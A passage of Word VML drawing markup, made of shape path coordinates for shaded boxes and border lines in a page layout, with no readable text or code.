4,10553,10484,10564,10484,10575,10484,10586,10484,10597,10484,10609,10484,10621,10484,10633,10484,10645,10484,10657,10484,10670,10484,10683,10484,10697,10484,10710,10484,10724,10484,10738,10484,10752,10484,10767,10484,10781,10484,10797,10484,10812,10484,10827,10484,10843,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10483,10859,10482,10859,10482,10859,10480,10859,10479,10859,10477,10859,10475,10859,10473,10859,10470,10859,10466,10859,10462,10859,10458,10859,10453,10859,10448,10859,10442,10859,10435,10859,10428,10859,10419,10859,10411,10859,10401,10859,10391,10859,10379,10859,10367,10859,10354,10859,10340,10859,10326,10859,10310,10859,10293,10859,10275,10859,10256,10859,10236,10859,10215,10859,10192,10859,10168,10859,10143,10859,10117,10859,10090,10859,10061,10859,10031,10859,9999,10859,9966,10859,9931,10859,9895,10859,9858,10859,9819,10859,9778,10859,9735,10859,9691,10859,9646,10859,9598,10859,9549,10859,9498,10859,9445,10859,9391,10859,9334,10859,9275,10859,9215,10859,9153,10859,9088,10859,9022,10859,8953,10859,8883,10859,8810,10859,8735,10859,8658,10859,8578,10859,8497,10859,8413,10859,8326,10859,8238,10859,8146,10859,8053,10859,7957,10859,7859,10859,7758,10859,7654,10859,7548,10859,7439,10859,7328,10859,7214,10859,7097,10859,6977,10859,6855,10859,6730,10859,6602,10859,6471,10859,6337,10859,6201,10859,6061,10859,5918,10859,5773,10859,5624,10859,5472,10859,5317,10859,5159,10859,4997,10859,4833,10859,4665,10859,4494,10859,4319,10859,4141,10859,3960,10859,3776,10859,3587,10859,3396,10859,3201,10859,3002,10859,2800,10859,2594,10859,2385,10859,2172,10859,1955,10859,1734,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10858,1510,10858,1510,10858,1510,10858,1510,10857,1510,10857,1510,10856,1510,10856,1510,10855,1510,10855,1510,10854,1510,10853,1510,10853,1510,10852,1510,10851,1510,10850,1510,10849,1510,10848,1510,10847,1510,10846,1510,10844,1510,10843,1510,10842,1510,10840,1510,10838,1510,10837,1510,10835,1510,10833,1510,10831,1510,10829,1510,10827,1510,10825,1510,10822,1510,10820,1510,10817,1510,10814,1510,10812,1510,10809,1510,10806,1510,10802,1510,10799,1510,10796,1510,10792,1510,10789,1510,10785,1510,10781,1510,10777,1510,10773,1510,10768,1510,10764,1510,10759,1510,10754,1510,10749,1510,10744,1510,10739,1510,10734,1510,10728,1510,10722,1510,10717,1510,10711,1510,10704,1510,10698,1510,10691,1510,10685,1510,10678,1510,10671,1510,10663,1510,10656,1510,10648,1510,10641,1510,10632,1510,10624,1510,10616,1510,10607,1510,10599,1510,10590,1510,10580,1510,10571,1510,10561,1510,10551,1510,10541,1510,10531,1510,10521,1510,10510,1510,10499,1510,10488,1510,10477,1510,10465,1510,10453,1510,10441,1510,10429,1510,10416,1510,10403,1510,10390,1510,10377,1510,10364,1510,10350,1510,10336,1510,10321,1510,10307,1510,10292,1510,10277,1510,10262,1510,10246,1510,10230,1510,10214e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:510.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10210" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:10210;width:30;height:650" coordorigin="1490,10210" coordsize="30,650" path="m1517,10214l1517,10214,1517,10214,1517,10214,1517,10214,1517,10214,1517,10214,1517,10214,1517,10214,1517,10214,1517,10214,1517,10215,1517,10215,1517,10215,1517,10215,1517,10215,1517,10215,1517,10216,1517,10216,1517,10216,1517,10217,1517,10217,1517,10218,1517,10218,1517,10219,1517,10219,1517,10220,1517,10221,1517,10222,1517,10223,1517,10223,1517,10224,1517,10226,1517,10227,1517,10228,1517,10229,1517,10231,1517,10232,1517,10234,1517,10235,1517,10237,1517,10239,1517,10241,1517,10243,1517,10245,1517,10247,1517,10249,1517,10251,1517,10254,1517,10256,1517,10259,1517,10262,1517,10265,1517,10268,1517,10271,1517,10274,1517,10278,1517,10281,1517,10285,1517,10289,1517,10293,1517,10297,1517,10301,1517,10305,1517,10310,1517,10315,1517,10319,1517,10324,1517,10329,1517,10335,1517,10340,1517,10345,1517,10351,1517,10357,1517,10363,1517,10369,1517,10376,1517,10382,1517,10389,1517,10396,1517,10403,1517,10410,1517,10418,1517,10425,1517,10433,1517,10441,1517,10449,1517,10458,1517,10466,1517,10475,1517,10484,1517,10493,1517,10503,1517,10512,1517,10522,1517,10532,1517,10542,1517,10553,1517,10564,1517,10575,1517,10586,1517,10597,1517,10609,1517,10621,1517,10633,1517,10645,1517,10657,1517,10670,1517,10683,1517,10697,1517,10710,1517,10724,1517,10738,1517,10752,1517,10767,1517,10781,1517,10797,1517,10812,1517,10827,1517,10843,1517,10859e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:541.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10830" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:10830;width:8990;height:390" coordorigin="1490,10830" coordsize="8990,390" path="m1510,10859l1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1511,10859,1512,10859,1512,10859,1514,10859,1515,10859,1517,10859,1519,10859,1521,10859,1524,10859,1528,10859,1532,10859,1536,10859,1541,10859,1546,10859,1552,10859,1559,10859,1566,10859,1575,10859,1583,10859,1593,10859,1603,10859,1615,10859,1627,10859,1640,10859,1654,10859,1668,10859,1684,10859,1701,10859,1719,10859,1738,10859,1758,10859,1780,10859,1802,10859,1826,10859,1851,10859,1877,10859,1904,10859,1933,10859,1963,10859,1995,10859,2028,10859,2063,10859,2099,10859,2136,10859,2175,10859,2216,10859,2259,10859,2303,10859,2348,10859,2396,10859,2445,10859,2496,10859,2549,10859,2604,10859,2660,10859,2719,10859,2779,10859,2841,10859,2906,10859,2972,10859,3041,10859,3112,10859,3184,10859,3259,10859,3336,10859,3416,10859,3498,10859,3582,10859,3668,10859,3757,10859,3848,10859,3941,10859,4037,10859,4136,10859,4236,10859,4340,10859,4446,10859,4555,10859,4666,10859,4780,10859,4897,10859,5017,10859,5139,10859,5264,10859,5392,10859,5523,10859,5657,10859,5793,10859,5933,10859,6076,10859,6222,10859,6370,10859,6522,10859,6677,10859,6835,10859,6997,10859,7161,10859,7329,10859,7500,10859,7675,10859,7853,10859,8034,10859,8219,10859,8407,10859,8598,10859,8793,10859,8992,10859,9194,10859,9400,10859,9609,10859,9823,10859,10039,10859,10260,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10861,10484,10861,10484,10861,10484,10861,10484,10861,10484,10862,10484,10862,10484,10862,10484,10863,10484,10863,10484,10864,10484,10864,10484,10865,10484,10865,10484,10866,10484,10866,10484,10867,10484,10868,10484,10869,10484,10869,10484,10870,10484,10871,10484,10872,10484,10873,10484,10874,10484,10875,10484,10876,10484,10878,10484,10879,10484,10880,10484,10882,10484,10883,10484,10885,10484,10886,10484,10888,10484,10890,10484,10891,10484,10893,10484,10895,10484,10897,10484,10899,10484,10901,10484,10903,10484,10906,10484,10908,10484,10910,10484,10913,10484,10916,10484,10918,10484,10921,10484,10924,10484,10927,10484,10930,10484,10933,10484,10936,10484,10939,10484,10943,10484,10946,10484,10950,10484,10953,10484,10957,10484,10961,10484,10965,10484,10969,10484,10973,10484,10977,10484,10982,10484,10986,10484,10991,10484,10995,10484,11000,10484,11005,10484,11010,10484,11015,10484,11021,10484,11026,10484,11031,10484,11037,10484,11043,10484,11049,10484,11055,10484,11061,10484,11067,10484,11073,10484,11080,10484,11086,10484,11093,10484,11100,10484,11107,10484,11114,10484,11121,10484,11129,10484,11136,10484,11144,10484,11152,10484,11160,10484,11168,10484,11176,10484,11185,10484,11193,10484,11202,10484,11211,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10483,11220,10482,11220,10482,11220,10480,11220,10479,11220,10477,11220,10475,11220,10473,11220,10470,11220,10466,11220,10462,11220,10458,11220,10453,11220,10448,11220,10442,11220,10435,11220,10428,11220,10419,11220,10411,11220,10401,11220,10391,11220,10379,11220,10367,11220,10354,11220,10340,11220,10326,11220,10310,11220,10293,11220,10275,11220,10256,11220,10236,11220,10215,11220,10192,11220,10168,11220,10143,11220,10117,11220,10090,11220,10061,11220,10031,11220,9999,11220,9966,11220,9931,11220,9895,11220,9858,11220,9819,11220,9778,11220,9735,11220,9691,11220,9646,11220,9598,11220,9549,11220,9498,11220,9445,11220,9391,11220,9334,11220,9275,11220,9215,11220,9153,11220,9088,11220,9022,11220,8953,11220,8883,11220,8810,11220,8735,11220,8658,11220,8578,11220,8497,11220,8413,11220,8326,11220,8238,11220,8146,11220,8053,11220,7957,11220,7859,11220,7758,11220,7654,11220,7548,11220,7439,11220,7328,11220,7214,11220,7097,11220,6977,11220,6855,11220,6730,11220,6602,11220,6471,11220,6337,11220,6201,11220,6061,11220,5918,11220,5773,11220,5624,11220,5472,11220,5317,11220,5159,11220,4997,11220,4833,11220,4665,11220,4494,11220,4319,11220,4141,11220,3960,11220,3776,11220,3587,11220,3396,11220,3201,11220,3002,11220,2800,11220,2594,11220,2385,11220,2172,11220,1955,11220,1734,11220,1510,11220,1510,11220,1510,11220,1510,11220,1510,11220,1510,11220,1510,11220,1510,11220,1510,11220,1510,11220,1510,11220,1510,11219,1510,11219,1510,11219,1510,11219,1510,11219,1510,11219,1510,11219,1510,11219,1510,11218,1510,11218,1510,11218,1510,11218,1510,11217,1510,11217,1510,11217,1510,11216,1510,11216,1510,11215,1510,11215,1510,11214,1510,11214,1510,11213,1510,11213,1510,11212,1510,11211,1510,11210,1510,11210,1510,11209,1510,11208,1510,11207,1510,11206,1510,11205,1510,11204,1510,11203,1510,11201,1510,11200,1510,11199,1510,11197,1510,11196,1510,11195,1510,11193,1510,11191,1510,11190,1510,11188,1510,11186,1510,11184,1510,11182,1510,11180,1510,11178,1510,11176,1510,11173,1510,11171,1510,11169,1510,11166,1510,11164,1510,11161,1510,11158,1510,11155,1510,11152,1510,11149,1510,11146,1510,11143,1510,11140,1510,11137,1510,11133,1510,11129,1510,11126,1510,11122,1510,11118,1510,11114,1510,11110,1510,11106,1510,11102,1510,11097,1510,11093,1510,11088,1510,11084,1510,11079,1510,11074,1510,11069,1510,11064,1510,11059,1510,11053,1510,11048,1510,11042,1510,11036,1510,11031,1510,11025,1510,11018,1510,11012,1510,11006,1510,10999,1510,10993,1510,10986,1510,10979,1510,10972,1510,10965,1510,10958,1510,10950,1510,10943,1510,10935,1510,10927,1510,10919,1510,10911,1510,10903,1510,10895,1510,10886,1510,10877,1510,10868,1510,10859e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:542.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10850" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:10850;width:30;height:370" coordorigin="1490,10850" coordsize="30,370" path="m1517,10859l1517,10859,1517,10859,1517,10859,1517,10859,1517,10859,1517,10860,1517,10860,1517,10860,1517,10860,1517,10860,1517,10860,1517,10860,1517,10860,1517,10860,1517,10860,1517,10860,1517,10860,1517,10861,1517,10861,1517,10861,1517,10861,1517,10861,1517,10862,1517,10862,1517,10862,1517,10863,1517,10863,1517,10864,1517,10864,1517,10865,1517,10865,1517,10866,1517,10866,1517,10867,1517,10868,1517,10869,1517,10869,1517,10870,1517,10871,1517,10872,1517,10873,1517,10874,1517,10875,1517,10876,1517,10878,1517,10879,1517,10880,1517,10882,1517,10883,1517,10885,1517,10886,1517,10888,1517,10890,1517,10891,1517,10893,1517,10895,1517,10897,1517,10899,1517,10901,1517,10903,1517,10906,1517,10908,1517,10910,1517,10913,1517,10916,1517,10918,1517,10921,1517,10924,1517,10927,1517,10930,1517,10933,1517,10936,1517,10939,1517,10943,1517,10946,1517,10950,1517,10953,1517,10957,1517,10961,1517,10965,1517,10969,1517,10973,1517,10977,1517,10982,1517,10986,1517,10991,1517,10995,1517,11000,1517,11005,1517,11010,1517,11015,1517,11021,1517,11026,1517,11031,1517,11037,1517,11043,1517,11049,1517,11055,1517,11061,1517,11067,1517,11073,1517,11080,1517,11086,1517,11093,1517,11100,1517,11107,1517,11114,1517,11121,1517,11129,1517,11136,1517,11144,1517,11152,1517,11160,1517,11168,1517,11176,1517,11185,1517,11193,1517,11202,1517,11211,1517,11220e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:560.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11210" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:11210;width:8990;height:650" coordorigin="1490,11210" coordsize="8990,650" path="m1510,11220l1510,11220,1510,11220,1510,11220,1510,11220,1510,11220,1510,11220,1511,11220,1512,11220,1512,11220,1514,11220,1515,11220,1517,11220,1519,11220,1521,11220,1524,11220,1528,11220,1532,11220,1536,11220,1541,11220,1546,11220,1552,11220,1559,11220,1566,11220,1575,11220,1583,11220,1593,11220,1603,11220,1615,11220,1627,11220,1640,11220,1654,11220,1668,11220,1684,11220,1701,11220,1719,11220,1738,11220,1758,11220,1780,11220,1802,11220,1826,11220,1851,11220,1877,11220,1904,11220,1933,11220,1963,11220,1995,11220,2028,11220,2063,11220,2099,11220,2136,11220,2175,11220,2216,11220,2259,11220,2303,11220,2348,11220,2396,11220,2445,11220,2496,11220,2549,11220,2604,11220,2660,11220,2719,11220,2779,11220,2841,11220,2906,11220,2972,11220,3041,11220,3112,11220,3184,11220,3259,11220,3336,11220,3416,11220,3498,11220,3582,11220,3668,11220,3757,11220,3848,11220,3941,11220,4037,11220,4136,11220,4236,11220,4340,11220,4446,11220,4555,11220,4666,11220,4780,11220,4897,11220,5017,11220,5139,11220,5264,11220,5392,11220,5523,11220,5657,11220,5793,11220,5933,11220,6076,11220,6222,11220,6370,11220,6522,11220,6677,11220,6835,11220,6997,11220,7161,11220,7329,11220,7500,11220,7675,11220,7853,11220,8034,11220,8219,11220,8407,11220,8598,11220,8793,11220,8992,11220,9194,11220,9400,11220,9609,11220,9823,11220,10039,11220,10260,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11220,10484,11221,10484,11221,10484,11221,10484,11222,10484,11222,10484,11222,10484,11223,10484,11223,10484,11224,10484,11224,10484,11225,10484,11226,10484,11226,10484,11227,10484,11228,10484,11229,10484,11230,10484,11231,10484,11232,10484,11233,10484,11235,10484,11236,10484,11238,10484,11239,10484,11241,10484,11242,10484,11244,10484,11246,10484,11248,10484,11250,10484,11252,10484,11255,10484,11257,10484,11259,10484,11262,10484,11265,10484,11268,10484,11270,10484,11274,10484,11277,10484,11280,10484,11283,10484,11287,10484,11291,10484,11294,10484,11298,10484,11302,10484,11307,10484,11311,10484,11315,10484,11320,10484,11325,10484,11330,10484,11335,10484,11340,10484,11345,10484,11351,10484,11357,10484,11363,10484,11369,10484,11375,10484,11381,10484,11388,10484,11394,10484,11401,10484,11408,10484,11416,10484,11423,10484,11431,10484,11439,10484,11447,10484,11455,10484,11463,10484,11472,10484,11481,10484,11490,10484,11499,10484,11508,10484,11518,10484,11528,10484,11538,10484,11548,10484,11558,10484,11569,10484,11580,10484,11591,10484,11603,10484,11614,10484,11626,10484,11638,10484,11650,10484,11663,10484,11676,10484,11689,10484,11702,10484,11716,10484,11729,10484,11743,10484,11758,10484,11772,10484,11787,10484,11802,10484,11817,10484,11833,10484,11849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5,1510,11864,1510,11864,1510,11864,1510,11864,1510,11864,1510,11863,1510,11863,1510,11863,1510,11862,1510,11862,1510,11861,1510,11861,1510,11860,1510,11860,1510,11859,1510,11858,1510,11857,1510,11857,1510,11856,1510,11855,1510,11854,1510,11852,1510,11851,1510,11850,1510,11849,1510,11847,1510,11846,1510,11844,1510,11842,1510,11840,1510,11839,1510,11837,1510,11835,1510,11832,1510,11830,1510,11828,1510,11825,1510,11823,1510,11820,1510,11817,1510,11814,1510,11811,1510,11808,1510,11805,1510,11801,1510,11798,1510,11794,1510,11790,1510,11786,1510,11782,1510,11778,1510,11774,1510,11769,1510,11765,1510,11760,1510,11755,1510,11750,1510,11745,1510,11739,1510,11734,1510,11728,1510,11722,1510,11716,1510,11710,1510,11703,1510,11697,1510,11690,1510,11683,1510,11676,1510,11669,1510,11661,1510,11654,1510,11646,1510,11638,1510,11630,1510,11621,1510,11613,1510,11604,1510,11595,1510,11586,1510,11576,1510,11567,1510,11557,1510,11547,1510,11537,1510,11526,1510,11515,1510,11505,1510,11493,1510,11482,1510,11470,1510,11459,1510,11447,1510,11434,1510,11422,1510,11409,1510,11396,1510,11383,1510,11369,1510,11355,1510,11341,1510,11327,1510,11312,1510,11298,1510,11283,1510,11267,1510,11252,1510,11236,1510,11220e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:560.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11210" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:11210;width:30;height:650" coordorigin="1490,11210" coordsize="30,650" path="m1517,11220l1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11220,1517,11221,1517,11221,1517,11221,1517,11222,1517,11222,1517,11222,1517,11223,1517,11223,1517,11224,1517,11224,1517,11225,1517,11226,1517,11226,1517,11227,1517,11228,1517,11229,1517,11230,1517,11231,1517,11232,1517,11233,1517,11235,1517,11236,1517,11238,1517,11239,1517,11241,1517,11242,1517,11244,1517,11246,1517,11248,1517,11250,1517,11252,1517,11255,1517,11257,1517,11259,1517,11262,1517,11265,1517,11268,1517,11270,1517,11274,1517,11277,1517,11280,1517,11283,1517,11287,1517,11291,1517,11294,1517,11298,1517,11302,1517,11307,1517,11311,1517,11315,1517,11320,1517,11325,1517,11330,1517,11335,1517,11340,1517,11345,1517,11351,1517,11357,1517,11363,1517,11369,1517,11375,1517,11381,1517,11388,1517,11394,1517,11401,1517,11408,1517,11416,1517,11423,1517,11431,1517,11439,1517,11447,1517,11455,1517,11463,1517,11472,1517,11481,1517,11490,1517,11499,1517,11508,1517,11518,1517,11528,1517,11538,1517,11548,1517,11558,1517,11569,1517,11580,1517,11591,1517,11603,1517,11614,1517,11626,1517,11638,1517,11650,1517,11663,1517,11676,1517,11689,1517,11702,1517,11716,1517,11729,1517,11743,1517,11758,1517,11772,1517,11787,1517,11802,1517,11817,1517,11833,1517,11849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18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11850" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:11850;width:8990;height:370" coordorigin="1490,11850" coordsize="8990,37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5,10484,11865,10484,11866,10484,11866,10484,11866,10484,11866,10484,11866,10484,11866,10484,11867,10484,11867,10484,11867,10484,11868,10484,11868,10484,11868,10484,11869,10484,11869,10484,11870,10484,11870,10484,11871,10484,11871,10484,11872,10484,11873,10484,11873,10484,11874,10484,11875,10484,11876,10484,11877,10484,11878,10484,11879,10484,11880,10484,11881,10484,11882,10484,11883,10484,11884,10484,11886,10484,11887,10484,11889,10484,11890,10484,11892,10484,11893,10484,11895,10484,11897,10484,11899,10484,11901,10484,11903,10484,11905,10484,11907,10484,11909,10484,11911,10484,11913,10484,11916,10484,11918,10484,11921,10484,11924,10484,11926,10484,11929,10484,11932,10484,11935,10484,11938,10484,11941,10484,11945,10484,11948,10484,11952,10484,11955,10484,11959,10484,11963,10484,11966,10484,11970,10484,11974,10484,11979,10484,11983,10484,11987,10484,11992,10484,11996,10484,12001,10484,12006,10484,12011,10484,12016,10484,12021,10484,12026,10484,12031,10484,12037,10484,12043,10484,12048,10484,12054,10484,12060,10484,12066,10484,12072,10484,12079,10484,12085,10484,12092,10484,12099,10484,12105,10484,12112,10484,12120,10484,12127,10484,12134,10484,12142,10484,12149,10484,12157,10484,12165,10484,12173,10484,12182,10484,12190,10484,12199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3,1510,12222,1510,12222,1510,12221,1510,12221,1510,12220,1510,12220,1510,12219,1510,12219,1510,12218,1510,12217,1510,12217,1510,12216,1510,12215,1510,12214,1510,12213,1510,12212,1510,12211,1510,12210,1510,12209,1510,12208,1510,12207,1510,12206,1510,12204,1510,12203,1510,12202,1510,12200,1510,12198,1510,12197,1510,12195,1510,12193,1510,12192,1510,12190,1510,12188,1510,12186,1510,12183,1510,12181,1510,12179,1510,12177,1510,12174,1510,12172,1510,12169,1510,12166,1510,12164,1510,12161,1510,12158,1510,12155,1510,12152,1510,12149,1510,12145,1510,12142,1510,12139,1510,12135,1510,12131,1510,12128,1510,12124,1510,12120,1510,12116,1510,12112,1510,12107,1510,12103,1510,12098,1510,12094,1510,12089,1510,12084,1510,12080,1510,12074,1510,12069,1510,12064,1510,12059,1510,12053,1510,12048,1510,12042,1510,12036,1510,12030,1510,12024,1510,12018,1510,12011,1510,12005,1510,11998,1510,11992,1510,11985,1510,11978,1510,11971,1510,11963,1510,11956,1510,11948,1510,11941,1510,11933,1510,11925,1510,11917,1510,11909,1510,11900,1510,11892,1510,11883,1510,11874,1510,11865e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:592.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11850" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:11850;width:30;height:370" coordorigin="1490,11850" coordsize="30,370" path="m1517,11865l1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11865,1517,11866,1517,11866,1517,11866,1517,11866,1517,11866,1517,11866,1517,11867,1517,11867,1517,11867,1517,11868,1517,11868,1517,11868,1517,11869,1517,11869,1517,11870,1517,11870,1517,11871,1517,11871,1517,11872,1517,11873,1517,11873,1517,11874,1517,11875,1517,11876,1517,11877,1517,11878,1517,11879,1517,11880,1517,11881,1517,11882,1517,11883,1517,11884,1517,11886,1517,11887,1517,11889,1517,11890,1517,11892,1517,11893,1517,11895,1517,11897,1517,11899,1517,11901,1517,11903,1517,11905,1517,11907,1517,11909,1517,11911,1517,11913,1517,11916,1517,11918,1517,11921,1517,11924,1517,11926,1517,11929,1517,11932,1517,11935,1517,11938,1517,11941,1517,11945,1517,11948,1517,11952,1517,11955,1517,11959,1517,11963,1517,11966,1517,11970,1517,11974,1517,11979,1517,11983,1517,11987,1517,11992,1517,11996,1517,12001,1517,12006,1517,12011,1517,12016,1517,12021,1517,12026,1517,12031,1517,12037,1517,12043,1517,12048,1517,12054,1517,12060,1517,12066,1517,12072,1517,12079,1517,12085,1517,12092,1517,12099,1517,12105,1517,12112,1517,12120,1517,12127,1517,12134,1517,12142,1517,12149,1517,12157,1517,12165,1517,12173,1517,12182,1517,12190,1517,12199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9.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12210" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:12210;width:8990;height:390" coordorigin="1490,12210" coordsize="8990,39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8,10484,12228,10484,12228,10484,12229,10484,12229,10484,12230,10484,12230,10484,12231,10484,12231,10484,12232,10484,12232,10484,12233,10484,12234,10484,12235,10484,12236,10484,12236,10484,12237,10484,12238,10484,12239,10484,12241,10484,12242,10484,12243,10484,12244,10484,12245,10484,12247,10484,12248,10484,12250,10484,12251,10484,12253,10484,12255,10484,12256,10484,12258,10484,12260,10484,12262,10484,12264,10484,12266,10484,12269,10484,12271,10484,12273,10484,12276,10484,12278,10484,12281,10484,12284,10484,12286,10484,12289,10484,12292,10484,12295,10484,12298,10484,12302,10484,12305,10484,12308,10484,12312,10484,12315,10484,12319,10484,12323,10484,12327,10484,12331,10484,12335,10484,12339,10484,12343,10484,12348,10484,12352,10484,12357,10484,12362,10484,12367,10484,12372,10484,12377,10484,12382,10484,12387,10484,12393,10484,12399,10484,12404,10484,12410,10484,12416,10484,12422,10484,12428,10484,12435,10484,12441,10484,12448,10484,12455,10484,12461,10484,12468,10484,12476,10484,12483,10484,12490,10484,12498,10484,12506,10484,12513,10484,12521,10484,12530,10484,12538,10484,12546,10484,12555,10484,12564,10484,12573,10484,12582,10484,12591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599,1510,12599,1510,12599,1510,12599,1510,12599,1510,12598,1510,12598,1510,12598,1510,12597,1510,12597,1510,12596,1510,12596,1510,12595,1510,12595,1510,12594,1510,12594,1510,12593,1510,12592,1510,12592,1510,12591,1510,12590,1510,12589,1510,12588,1510,12587,1510,12586,1510,12585,1510,12584,1510,12583,1510,12581,1510,12580,1510,12579,1510,12577,1510,12576,1510,12574,1510,12573,1510,12571,1510,12569,1510,12567,1510,12565,1510,12563,1510,12561,1510,12559,1510,12557,1510,12555,1510,12552,1510,12550,1510,12547,1510,12545,1510,12542,1510,12539,1510,12536,1510,12533,1510,12530,1510,12527,1510,12524,1510,12521,1510,12517,1510,12514,1510,12510,1510,12506,1510,12503,1510,12499,1510,12495,1510,12491,1510,12486,1510,12482,1510,12478,1510,12473,1510,12468,1510,12464,1510,12459,1510,12454,1510,12449,1510,12443,1510,12438,1510,12433,1510,12427,1510,12421,1510,12415,1510,12409,1510,12403,1510,12397,1510,12391,1510,12384,1510,12378,1510,12371,1510,12364,1510,12357,1510,12350,1510,12343,1510,12335,1510,12328,1510,12320,1510,12312,1510,12304,1510,12296,1510,12288,1510,12279,1510,12270,1510,12262,1510,12253,1510,12244,1510,12235,1510,12225e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:610.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12210" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:12210;width:30;height:390" coordorigin="1490,12210" coordsize="30,390" path="m1517,12225l1517,12225,1517,12225,1517,12225,1517,12225,1517,12225,1517,12225,1517,12225,1517,12225,1517,12225,1517,12225,1517,12225,1517,12225,1517,12226,1517,12226,1517,12226,1517,12226,1517,12226,1517,12226,1517,12226,1517,12227,1517,12227,1517,12227,1517,12228,1517,12228,1517,12228,1517,12229,1517,12229,1517,12230,1517,12230,1517,12231,1517,12231,1517,12232,1517,12232,1517,12233,1517,12234,1517,12235,1517,12236,1517,12236,1517,12237,1517,12238,1517,12239,1517,12241,1517,12242,1517,12243,1517,12244,1517,12245,1517,12247,1517,12248,1517,12250,1517,12251,1517,12253,1517,12255,1517,12256,1517,12258,1517,12260,1517,12262,1517,12264,1517,12266,1517,12269,1517,12271,1517,12273,1517,12276,1517,12278,1517,12281,1517,12284,1517,12286,1517,12289,1517,12292,1517,12295,1517,12298,1517,12302,1517,12305,1517,12308,1517,12312,1517,12315,1517,12319,1517,12323,1517,12327,1517,12331,1517,12335,1517,12339,1517,12343,1517,12348,1517,12352,1517,12357,1517,12362,1517,12367,1517,12372,1517,12377,1517,12382,1517,12387,1517,12393,1517,12399,1517,12404,1517,12410,1517,12416,1517,12422,1517,12428,1517,12435,1517,12441,1517,12448,1517,12455,1517,12461,1517,12468,1517,12476,1517,12483,1517,12490,1517,12498,1517,12506,1517,12513,1517,12521,1517,12530,1517,12538,1517,12546,1517,12555,1517,12564,1517,12573,1517,12582,1517,12591,1517,12600e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:629.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12590" coordsize="8990,630">
